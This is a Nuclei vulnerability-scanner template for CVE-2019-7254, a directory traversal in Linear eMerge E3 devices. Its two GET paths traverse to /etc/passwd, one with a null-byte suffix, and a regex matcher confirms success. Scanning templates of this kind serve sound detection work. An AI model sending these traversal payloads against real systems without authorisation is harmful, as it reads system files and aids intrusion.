nuclei-templates/cves/2019/CVE-2019-7254.yaml

33 lines
765 B
YAML

id: CVE-2019-7254
info:
name: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
author: 0x_Akoko
severity: high
description: Linear eMerge E3-Series devices allow File Inclusion.
reference:
- https://www.exploit-db.com/exploits/47616
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2019-7254
cwe-id: CWE-22
tags: cve,cve2019,emerge,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/?c=../../../../../../etc/passwd%00"
- "{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200